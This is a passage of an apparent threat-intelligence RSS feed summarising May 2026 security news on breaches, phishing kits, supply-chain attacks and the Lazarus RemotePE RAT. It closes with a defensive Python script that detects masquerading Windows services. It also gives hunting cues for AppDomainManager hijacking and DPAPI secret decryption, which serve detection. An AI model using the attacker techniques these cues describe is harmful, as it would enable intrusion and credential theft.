&lt;p&gt;Implement strong access controls, monitor for unusual data access patterns, and regularly test incident response procedures to quickly contain and mitigate such breaches.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Breach, Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/7-eleven-data-breach-exposes-personal-information-of-185-000-people/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 07:01:12 GMT</pubDate>
      <dc:creator>Sergiu Gatlan</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/7-eleven-data-breach-exposes-personal-information-of-185-000-people/">Bleeping Computer</source>
      <category>Malware</category>
      <category>Data Breach</category>
      <category>Extortion</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>340 Million OnlyFans Profiles Allegedly Rebuilt from Leaks</title>
      <link>https://brewedintel.io/articles/abd83ea7-a162-48bf-b7be-abb0d409734f</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/abd83ea7-a162-48bf-b7be-abb0d409734f</guid>
      <description>An unknown threat actor using the alias &#x27;Euphoric_Reply_5727&#x27; is selling a dataset claiming to contain records of 340 million OnlyFans users on a cybercrime forum. However, investigation reveals the dataset was not obtained via a direct breach of OnlyFans. Instead, it was assembled by correlating data from previous breaches and public information, including usernames, emails, phone numbers, and account details. While the data appears partially authentic, its value lies in linking online personas to real-world identities. The privacy risk is significant, as this composite data can be used for targeted phishing, impersonation, stalking, and blackmail. This incident highlights a growing trend of threat actors building searchable identity databases from combined leaked and public data. OnlyFans users are advised to be vigilant against phishing attempts and review their privacy settings.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;An unknown threat actor using the alias &amp;#x27;Euphoric_Reply_5727&amp;#x27; is selling a dataset claiming to contain records of 340 million OnlyFans users on a cybercrime forum. However, investigation reveals the dataset was not obtained via a direct breach of OnlyFans. Instead, it was assembled by correlating data from previous breaches and public information, including usernames, emails, phone numbers, and account details. While the data appears partially authentic, its value lies in linking online personas to real-world identities. The privacy risk is significant, as this composite data can be used for targeted phishing, impersonation, stalking, and blackmail. This incident highlights a growing trend of threat actors building searchable identity databases from combined leaked and public data. OnlyFans users are advised to be vigilant against phishing attempts and review their privacy settings.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Other, Medium Severity, Data Aggregation, Identity Theft, Phishing Campaign&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Security Affairs (Data Breach) | &lt;a href=&quot;https://securityaffairs.com/192643/cyber-crime/340-million-onlyfans-profiles-allegedly-rebuilt-from-leaks.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 25 May 2026 17:10:45 GMT</pubDate>
      <dc:creator>Pierluigi Paganini</dc:creator>
      <source url="https://securityaffairs.com/192643/cyber-crime/340-million-onlyfans-profiles-allegedly-rebuilt-from-leaks.html">Security Affairs (Data Breach)</source>
      <category>Other</category>
      <category>Data Aggregation</category>
      <category>Identity Theft</category>
      <category>Phishing Campaign</category>
      <category>Medium Severity</category>
    </item>
    <item>
      <title>25th May – Threat Intelligence Report</title>
      <link>https://brewedintel.io/articles/cf3fe0d8-0080-4297-b1ae-c2fc0e654182</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/cf3fe0d8-0080-4297-b1ae-c2fc0e654182</guid>
      <description>This week&#x27;s threat intelligence report covers multiple high-impact incidents. ShinyHunters breached 7-Eleven, stealing over 600,000 Salesforce records. GitHub suffered a breach via a weaponized VS Code extension, exfiltrating 3,800 internal repositories. Grafana Labs also experienced a breach but refused ransom. The FBI warned about Kali365, a phishing kit targeting Microsoft 365 with device-code phishing that bypasses MFA. AI threats include campaigns compromising nine Mexican government agencies and a Russian actor using AI for propaganda and credential theft. Critical vulnerabilities include actively exploited Windows Defender flaws, Trend Micro Apex One directory traversal, and Drupal SQL injection under active mass attack. Threat intelligence reveals Nimbus Manticore (IRGC-linked) using SEO poisoning to deliver MiniFast backdoor, a 124% surge in hacktivism and ransomware in Germany, Austria, and Switzerland, Showboat Linux malware targeting telecoms, and a Laravel supply chain attack. Patching, multi-factor authentication, and monitoring for token theft are critical mitigations.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This week&amp;#x27;s threat intelligence report covers multiple high-impact incidents. ShinyHunters breached 7-Eleven, stealing over 600,000 Salesforce records. GitHub suffered a breach via a weaponized VS Code extension, exfiltrating 3,800 internal repositories. Grafana Labs also experienced a breach but refused ransom. The FBI warned about Kali365, a phishing kit targeting Microsoft 365 with device-code phishing that bypasses MFA. AI threats include campaigns compromising nine Mexican government agencies and a Russian actor using AI for propaganda and credential theft. Critical vulnerabilities include actively exploited Windows Defender flaws, Trend Micro Apex One directory traversal, and Drupal SQL injection under active mass attack. Threat intelligence reveals Nimbus Manticore (IRGC-linked) using SEO poisoning to deliver MiniFast backdoor, a 124% surge in hacktivism and ransomware in Germany, Austria, and Switzerland, Showboat Linux malware targeting telecoms, and a Laravel supply chain attack. Patching, multi-factor authentication, and monitoring for token theft are critical mitigations.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Defenders should be concerned about the breadth of attacks including supply chain compromise, AI-driven phishing, and rapid exploitation of critical vulnerabilities, which pose significant risks to organizational security and data integrity.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Prioritize patching for Windows Defender, Trend Micro Apex One, and Drupal; implement phishing-resistant MFA; monitor for OAuth token abuse; restrict access to GitHub and CI/CD pipelines; and review AI email filters for injection evasion.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, High Severity, Data Breach, Exploit, Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Check Point Research | &lt;a href=&quot;https://research.checkpoint.com/2026/25th-may-threat-intelligence-report/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 25 May 2026 15:08:40 GMT</pubDate>
      <dc:creator>urias</dc:creator>
      <source url="https://research.checkpoint.com/2026/25th-may-threat-intelligence-report/">Check Point Research</source>
      <category>Vulnerability</category>
      <category>Data Breach</category>
      <category>Exploit</category>
      <category>Phishing</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services</title>
      <link>https://brewedintel.io/articles/d690c1a1-6096-4184-a58c-90dc0c9e5f95</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/d690c1a1-6096-4184-a58c-90dc0c9e5f95</guid>
      <description>The article details a rapidly evolving Chinese-language Phishing-as-a-Service (PhaaS) ecosystem leveraging AI automation and encrypted delivery channels (RCS, iMessage) to bypass carrier filters. Operators utilize real-time interception panels to capture credentials and OTPs, bypassing MFA instantly. Monetization has shifted toward digital wallet provisioning and tokenization, enabling direct unauthorized financial control beyond traditional account takeovers. Platforms like Darcula and YY Lai Yu lower the technical barrier for global affiliates, targeting lucrative international markets with highly localized, AI-generated lures. Mitigation requires moving beyond basic user awareness toward robust technical controls. Organizations should prioritize adopting FIDO2/WebAuthn security keys to neutralize real-time OTP interception, alongside implementing risk-based authentication and device fingerprinting during financial provisioning to render stolen credentials unusable.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The article details a rapidly evolving Chinese-language Phishing-as-a-Service (PhaaS) ecosystem leveraging AI automation and encrypted delivery channels (RCS, iMessage) to bypass carrier filters. Operators utilize real-time interception panels to capture credentials and OTPs, bypassing MFA instantly. Monetization has shifted toward digital wallet provisioning and tokenization, enabling direct unauthorized financial control beyond traditional account takeovers. Platforms like Darcula and YY Lai Yu lower the technical barrier for global affiliates, targeting lucrative international markets with highly localized, AI-generated lures. Mitigation requires moving beyond basic user awareness toward robust technical controls. Organizations should prioritize adopting FIDO2/WebAuthn security keys to neutralize real-time OTP interception, alongside implementing risk-based authentication and device fingerprinting during financial provisioning to render stolen credentials unusable.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;High-severity PhaaS platforms now bypass MFA in real-time and tokenize stolen cards for direct financial theft, lowering the barrier for global affiliates and rapidly escalating losses.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Deploy FIDO2/WebAuthn hardware keys to neutralize OTP interception, and enforce risk-based verification with device fingerprinting during digital wallet provisioning to block credential weaponization.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Credential Harvesting, Financial Fraud, MFA Bypass&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Mandiant Frontline Blog | &lt;a href=&quot;https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 25 May 2026 14:00:00 GMT</pubDate>
      <dc:creator>Google Threat Intelligence Group</dc:creator>
      <source url="https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/">Mandiant Frontline Blog</source>
      <category>Incident</category>
      <category>Credential Harvesting</category>
      <category>Financial Fraud</category>
      <category>MFA Bypass</category>
      <category>Phishing-as-a-Service</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>TeamPCP Supply Chain Campaign: Activity Through 2026-05-24, (Mon, May 25th)</title>
      <link>https://brewedintel.io/articles/a4e5480a-2d8f-4bec-bccc-8b2744b3de02</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/a4e5480a-2d8f-4bec-bccc-8b2744b3de02</guid>
      <description>TeamPCP is conducting a sophisticated supply chain campaign across three package ecosystems, including GitHub and Microsoft. They have trojanized a Microsoft-published Python SDK, compromised GitHub&#x27;s internal codebase, and open-sourced their own framework. This widespread campaign puts downstream users at significant risk of compromise. Immediate verification of package integrity and monitoring for anomalous behavior is recommended.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;TeamPCP is conducting a sophisticated supply chain campaign across three package ecosystems, including GitHub and Microsoft. They have trojanized a Microsoft-published Python SDK, compromised GitHub&amp;#x27;s internal codebase, and open-sourced their own framework. This widespread campaign puts downstream users at significant risk of compromise. Immediate verification of package integrity and monitoring for anomalous behavior is recommended.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This campaign demonstrates sophisticated supply chain compromise targeting multiple ecosystems, including Microsoft and GitHub, putting downstream users at risk.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Verify the integrity of third-party packages, monitor for anomalous behavior, and restrict use of untrusted repositories.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, Critical Severity, Supply Chain Attack, Trojanized Software&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SANS Internet Storm Center | &lt;a href=&quot;https://isc.sans.edu/diary/rss/33016&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 25 May 2026 13:26:06 GMT</pubDate>
      <source url="https://isc.sans.edu/diary/rss/33016">SANS Internet Storm Center</source>
      <category>Malware</category>
      <category>Supply Chain Attack</category>
      <category>Trojanized Software</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>TeamPCP Supply Chain Campaign: Activity Through 2026-05-24, (Mon, May 25th)</title>
      <link>https://brewedintel.io/articles/c9487792-4947-4dea-8720-4d23da730c73</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/c9487792-4947-4dea-8720-4d23da730c73</guid>
      <description>TeamPCP supply chain campaign operates across three package ecosystems, compromising GitHub&#x27;s internal codebase and trojanizing a Microsoft-published Python SDK. The group has also open-sourced its attack framework. This campaign poses a critical threat to software supply chain integrity, impacting major tech platforms. Immediate review of dependencies and enhanced supply chain security measures are recommended.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;TeamPCP supply chain campaign operates across three package ecosystems, compromising GitHub&amp;#x27;s internal codebase and trojanizing a Microsoft-published Python SDK. The group has also open-sourced its attack framework. This campaign poses a critical threat to software supply chain integrity, impacting major tech platforms. Immediate review of dependencies and enhanced supply chain security measures are recommended.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Supply chain attacks can undermine trust in widely used software, as seen with TeamPCP compromising GitHub internal and Microsoft SDKs, potentially affecting downstream users.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement strict package integrity verification, monitor for unauthorized changes, and use software composition analysis to detect trojanized components.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, Critical Severity, Supply Chain Attack, Trojanized Software&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SANS Internet Storm Center | &lt;a href=&quot;https://isc.sans.edu/diary/rss/33014&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 25 May 2026 13:25:47 GMT</pubDate>
      <source url="https://isc.sans.edu/diary/rss/33014">SANS Internet Storm Center</source>
      <category>Malware</category>
      <category>Supply Chain Attack</category>
      <category>Trojanized Software</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Lazarus Deploys RemotePE Memory-Only RAT Against Financial and Crypto Firms</title>
      <link>https://brewedintel.io/articles/5714ff47-f862-49f9-b9a8-b83c328b6361</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/5714ff47-f862-49f9-b9a8-b83c328b6361</guid>
      <description>The Lazarus Group, a North Korean state-sponsored threat actor, is deploying a new cross-platform remote access trojan (RAT) called RemotePE against financial and cryptocurrency organizations. The attack chain involves two loaders, DPAPILoader and RemotePELoader, which decrypt and execute the memory-only payload. This in-memory operation helps evade detection. The campaign highlights Lazarus&#x27;s continued focus on cryptocurrency targets and the financial sector, posing a significant threat due to the group&#x27;s sophistication and history of high-impact attacks. Organizations in these verticals should remain vigilant and implement advanced monitoring for memory-resident malware.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Lazarus Group, a North Korean state-sponsored threat actor, is deploying a new cross-platform remote access trojan (RAT) called RemotePE against financial and cryptocurrency organizations. The attack chain involves two loaders, DPAPILoader and RemotePELoader, which decrypt and execute the memory-only payload. This in-memory operation helps evade detection. The campaign highlights Lazarus&amp;#x27;s continued focus on cryptocurrency targets and the financial sector, posing a significant threat due to the group&amp;#x27;s sophistication and history of high-impact attacks. Organizations in these verticals should remain vigilant and implement advanced monitoring for memory-resident malware.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Lazarus Group is a highly capable APT known for targeting financial institutions and crypto exchanges; their use of memory-only techniques makes this attack difficult to detect with traditional file-based signatures.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Deploy endpoint detection and response (EDR) solutions capable of monitoring anomalous memory allocations and process injections, and ensure staff are trained to recognize phishing attempts that may deliver the initial payload.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Memory-Only Malware, RAT&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/lazarus-deploys-remotepe-memory-only.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 25 May 2026 09:32:54 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/lazarus-deploys-remotepe-memory-only.html">The Hacker News</source>
      <category>Malware</category>
      <category>Memory-Only Malware</category>
      <category>RAT</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Netherlands seizes 800 servers of hosting firm enabling cyberattacks</title>
      <link>https://brewedintel.io/articles/7a0d4e9f-e77b-4afa-8779-b1fef4aa0da5</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/7a0d4e9f-e77b-4afa-8779-b1fef4aa0da5</guid>
      <description>Dutch financial crime investigators arrested two individuals and seized 800 servers from a web hosting company that facilitated cyberattacks, interference operations, and disinformation campaigns. The operation, led by the FIOD, targeted an organization that provided infrastructure for malicious activities, significantly disrupting the ability of threat actors to operate. This action underscores the importance of international law enforcement collaboration in combating cyber-enabled crime and dismantling the infrastructure that supports it. The seizure marks a notable success in the fight against cybercrime, though the specific threat actors and malware families involved have not been disclosed.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Dutch financial crime investigators arrested two individuals and seized 800 servers from a web hosting company that facilitated cyberattacks, interference operations, and disinformation campaigns. The operation, led by the FIOD, targeted an organization that provided infrastructure for malicious activities, significantly disrupting the ability of threat actors to operate. This action underscores the importance of international law enforcement collaboration in combating cyber-enabled crime and dismantling the infrastructure that supports it. The seizure marks a notable success in the fight against cybercrime, though the specific threat actors and malware families involved have not been disclosed.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This seizure demonstrates that hosting providers can be a critical enabler for cyberattacks; organizations should be aware that such infrastructure may be used to host malicious content or command-and-control servers, potentially impacting their networks.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Monitor network traffic for connections to IP ranges associated with known malicious hosting providers, and consider implementing blocklists based on law enforcement disclosures. Additionally, review third-party vendor risk associated with hosting services.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Cyber Attack Infrastructure, Disinformation Campaign&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/netherlands-seizes-800-servers-of-hosting-firm-enabling-cyberattacks/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 17:24:52 GMT</pubDate>
      <dc:creator>Bill Toulas</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/netherlands-seizes-800-servers-of-hosting-firm-enabling-cyberattacks/">Bleeping Computer</source>
      <category>Adversary</category>
      <category>Cyber Attack Infrastructure</category>
      <category>Disinformation Campaign</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Ghostwriter Targets Ukraine Government Entities with Prometheus Phishing Malware</title>
      <link>https://brewedintel.io/articles/331b3242-8cd6-4e54-808b-bde9d0f35e97</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/331b3242-8cd6-4e54-808b-bde9d0f35e97</guid>
      <description>The Belarus-aligned threat actor Ghostwriter (UAC-0057/UNC1151) is targeting Ukrainian government entities using phishing email lures referencing the Ukrainian online learning platform Prometheus. CERT-UA reported the campaign, which aims to deliver malware via spear-phishing attacks. The group&#x27;s focus on government organizations indicates a strategic interest in gathering intelligence or disrupting operations. The use of a lure themed on a legitimate platform increases the likelihood of successful compromise. Organizations should be vigilant for emails purporting to be from Prometheus or related to online learning, as they may carry malicious payloads. Immediate implementation of email security controls and user awareness training is recommended to mitigate this threat.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Belarus-aligned threat actor Ghostwriter (UAC-0057/UNC1151) is targeting Ukrainian government entities using phishing email lures referencing the Ukrainian online learning platform Prometheus. CERT-UA reported the campaign, which aims to deliver malware via spear-phishing attacks. The group&amp;#x27;s focus on government organizations indicates a strategic interest in gathering intelligence or disrupting operations. The use of a lure themed on a legitimate platform increases the likelihood of successful compromise. Organizations should be vigilant for emails purporting to be from Prometheus or related to online learning, as they may carry malicious payloads. Immediate implementation of email security controls and user awareness training is recommended to mitigate this threat.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Ghostwriter is actively targeting Ukrainian government entities with spear-phishing emails leveraging the Prometheus platform theme, posing a risk of initial access and follow-on malicious activities.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enhance email filtering for Prometheus-related lures and conduct user awareness training to identify and report suspicious emails. Verify any unsolicited email links or attachments before interaction.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/ghostwriter-targets-ukraine-government.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 16:20:32 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/ghostwriter-targets-ukraine-government.html">The Hacker News</source>
      <category>Malware</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Fast and Furious – Nimbus Manticore Operations During the Iranian Conflict</title>
      <link>https://brewedintel.io/articles/cf4b6d0a-d027-48f2-9780-f5ae6031ca53</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/cf4b6d0a-d027-48f2-9780-f5ae6031ca53</guid>
      <description>Check Point Research reports on Nimbus Manticore (UNC1549), an IRGC-affiliated threat actor active during Operation Epic Fury (Feb 2026). The group employed spear-phishing lures targeting aviation and software sectors, leveraging SEO poisoning and AppDomain Hijacking for initial access and execution. A new AI-assisted backdoor, MiniFast, was deployed alongside the MiniJunk framework. Campaigns included destructive attacks and data exfiltration from cloud environments against US and Israeli entities. The actor demonstrated rapid adaptation amid wartime conditions, emphasizing the need for heightened vigilance against targeted phishing and emerging evasion techniques.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Check Point Research reports on Nimbus Manticore (UNC1549), an IRGC-affiliated threat actor active during Operation Epic Fury (Feb 2026). The group employed spear-phishing lures targeting aviation and software sectors, leveraging SEO poisoning and AppDomain Hijacking for initial access and execution. A new AI-assisted backdoor, MiniFast, was deployed alongside the MiniJunk framework. Campaigns included destructive attacks and data exfiltration from cloud environments against US and Israeli entities. The actor demonstrated rapid adaptation amid wartime conditions, emphasizing the need for heightened vigilance against targeted phishing and emerging evasion techniques.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This IRGC-affiliated group is actively targeting defense, aviation, and telecom sectors with sophisticated malware and novel evasion techniques during a geopolitical conflict, posing a direct threat to national security and critical infrastructure.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce multi-layered defenses against spear-phishing; monitor for AppDomainManager hijacking by looking for anomalous .exe.config files (appDomainManagerAssembly and appDomainManagerType entries under the runtime section) and for the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables; and rely on behavioral detection rather than signatures alone for MiniFast, a new backdoor whose AI-assisted development suggests it will change quickly. Update signatures as they become available and conduct threat hunting for UNC1549 TTPs.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Exfiltration, Destructive Attack, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Check Point Research | &lt;a href=&quot;https://research.checkpoint.com/2026/fast-and-furious-nimbus-manticore-operations-during-the-iranian-conflict/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 15:09:29 GMT</pubDate>
      <dc:creator>stcpresearch</dc:creator>
      <source url="https://research.checkpoint.com/2026/fast-and-furious-nimbus-manticore-operations-during-the-iranian-conflict/">Check Point Research</source>
      <category>Malware</category>
      <category>Data Exfiltration</category>
      <category>Destructive Attack</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>RemotePE: The Lazarus RAT that lives in memory</title>
      <link>https://brewedintel.io/articles/59d1abff-9a21-4673-af1d-a56859609625</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/59d1abff-9a21-4673-af1d-a56859609625</guid>
      <description>This article details a sophisticated memory-only toolset used by a Lazarus subgroup targeting financial and cryptocurrency organizations. The toolset consists of three components: DPAPILoader, which uses DPAPI and environmental keying to decrypt and load RemotePELoader from disk; RemotePELoader, which beacons to a C2 server and receives RemotePE; and RemotePE, a RAT executed entirely in memory. The malware evades detection through DPAPI encryption, memory-only execution, and masquerading as legitimate Windows services. The toolset&#x27;s low forensic footprint makes it suitable for long-term observation campaigns, often preceding high-impact theft. Defenders are encouraged to hunt for service masquerading and memory-resident payloads.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This article details a sophisticated memory-only toolset used by a Lazarus subgroup targeting financial and cryptocurrency organizations. The toolset consists of three components: DPAPILoader, which uses DPAPI and environmental keying to decrypt and load RemotePELoader from disk; RemotePELoader, which beacons to a C2 server and receives RemotePE; and RemotePE, a RAT executed entirely in memory. The malware evades detection through DPAPI encryption, memory-only execution, and masquerading as legitimate Windows services. The toolset&amp;#x27;s low forensic footprint makes it suitable for long-term observation campaigns, often preceding high-impact theft. Defenders are encouraged to hunt for service masquerading and memory-resident payloads.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This sophisticated Lazarus toolset can maintain persistent, fileless access for extended periods, potentially leading to large-scale financial theft from targeted organizations.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Monitor service installations (System log Event ID 7045, Security log Event ID 4697) for services mimicking Internet Authentication Service, and investigate unknown services, including svchost-hosted ones, whose binaries or service DLLs load from unusual paths. Additionally, deploy behavioral detection for memory-only payload execution (unbacked executable memory, reflective loading) and for DPAPI unprotect calls from processes that have no business decrypting user secrets.&lt;/p&gt;
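&lt;p&gt;A concrete way to hunt for the service masquerading described above: review each service-installation record (System log Event ID 7045, or Security Event ID 4697 when the Audit Security System Extension subcategory is enabled) and flag names that resemble built-in services but point at binaries or service DLLs outside the system directory. The following is an added example, not Fox-IT's code; the reference table of service names, the similarity threshold and the event records are constructed for illustration.&lt;/p&gt;

```python
"""Flag newly installed Windows services that masquerade as built-in ones:
lookalike names with binaries or service DLLs outside the system directory.
Added example, not Fox-IT's code; reference data and records are constructed."""
import difflib

# Assumed reference table of built-in service names (key) and display names
# (value). Build the real one from a golden image of each Windows build.
KNOWN_SERVICES = {
    "IAS": "Internet Authentication Service",
    "Dhcp": "DHCP Client",
    "Dnscache": "DNS Client",
    "WinDefend": "Microsoft Defender Antivirus Service",
}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
NAME_SIMILARITY = 0.8  # difflib ratio at or above which a name is a lookalike


def executable_of(image_path: str) -> str:
    """Strip quoting and arguments from an ImagePath, lowercase the result."""
    path = image_path.strip()
    if path.startswith('"'):
        path = path[1:].split('"', 1)[0]
    else:
        path = path.split(" ", 1)[0]
    return path.lower()


def in_system_dir(path: str) -> bool:
    exe = executable_of(path)
    return any(exe.startswith(d) for d in SYSTEM_DIRS)


def lookalike_of(name: str) -> str:
    """Return the built-in service or display name this name resembles,
    or '' when nothing is close enough."""
    best, best_ratio = "", 0.0
    for cand in list(KNOWN_SERVICES) + list(KNOWN_SERVICES.values()):
        ratio = difflib.SequenceMatcher(None, name.lower(), cand.lower()).ratio()
        if ratio > best_ratio:
            best, best_ratio = cand, ratio
    return best if best_ratio >= NAME_SIMILARITY else ""


def assess_service_install(event: dict) -> list:
    """Evaluate one service-installed record shaped like Event ID 7045
    (ServiceName, ImagePath, optional ServiceDll). Returns reasons; an
    empty list means nothing stood out."""
    reasons = []
    name = event.get("ServiceName", "")
    image = event.get("ImagePath", "")
    service_dll = event.get("ServiceDll", "")
    match = lookalike_of(name)
    if match and not in_system_dir(image):
        reasons.append(f"resembles built-in service '{match}' but runs from {executable_of(image)}")
    if match and name.lower() != match.lower():
        reasons.append(f"near-miss spelling of built-in service name '{match}'")
    # For svchost-hosted services the DLL is the code that actually runs.
    if executable_of(image).endswith("svchost.exe") and service_dll and not in_system_dir(service_dll):
        reasons.append(f"svchost-hosted service loads {service_dll} from outside the system directory")
    return reasons


# Constructed records in the shape of Event ID 7045; not from the report.
SAMPLE_EVENTS = [
    {"ServiceName": "Internet Authentication Services",
     "ImagePath": r"C:\Users\Public\Libraries\ias.exe"},
    {"ServiceName": "DHCP Client",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted",
     "ServiceDll": r"C:\Windows\System32\dhcpcore.dll"},
    {"ServiceName": "DNS Client",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k NetworkService",
     "ServiceDll": r"C:\ProgramData\Microsoft\dnsclient.dll"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ServiceName"], assess_service_install(ev))
```

&lt;p&gt;Event ID 7045 does not carry the ServiceDll value; for svchost-hosted services read it from the Parameters subkey under the service's registry key and join it to the event. A memory-only payload leaves nothing on disk to match, so this check is about the foothold (the loader's service), which is exactly the artefact the toolset cannot avoid creating.&lt;/p&gt;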
&lt;h2&gt;Classification&lt;/h2&gt;
